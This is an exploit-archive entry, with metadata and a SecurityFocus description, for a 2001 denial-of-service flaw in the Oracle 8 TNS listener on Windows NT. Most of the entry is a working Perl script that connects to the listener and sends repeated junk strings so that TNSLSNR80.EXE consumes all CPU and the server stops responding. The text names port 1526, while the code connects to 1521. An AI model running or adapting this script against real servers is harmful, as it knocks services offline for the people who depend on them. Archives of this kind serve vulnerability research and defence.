Oracle 8 Server - 'TNSLSNR80.EXE' Denial of Service

Author: r0ot@runbox.com
type: dos
platform: windows
port: 
date_added: 2001-04-18 
date_updated: 2012-08-24 
verified: 1 
codes: OSVDB-86897 
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/2626/info

A denial of service vulnerability exists in Oracle 8. An attacker connecting to port 1526 and sending invalid input will cause the 'TNSLSNR80.EXE' process to consume all available system resources, causing the server to stop responding.

#!/usr/local/bin/perl -w

# This little script crashes Oracle 8.0 on Windows NT 4.0 (Sp6)
# TNSLSNR80.EXE will consume 100% CPU...
#
# by r0ot@runbox.com

use IO::Socket;

$host="kickme";
# enter the hostname of the oracle-server to kick

socket(HANDLE, PF_INET, SOCK_STREAM, 6);
connect(HANDLE, sockaddr_in(1521, scalar gethostbyname($host)));
HANDLE->autoflush(1);

sleep(2);
print HANDLE "\n";
for ($i=0; $i<3; $i++) {
        sleep(2);
        print HANDLE "dfsdffdfsfdggfdgdf";
        # an arbitrary, but carefully chosen constant...
}

close(HANDLE);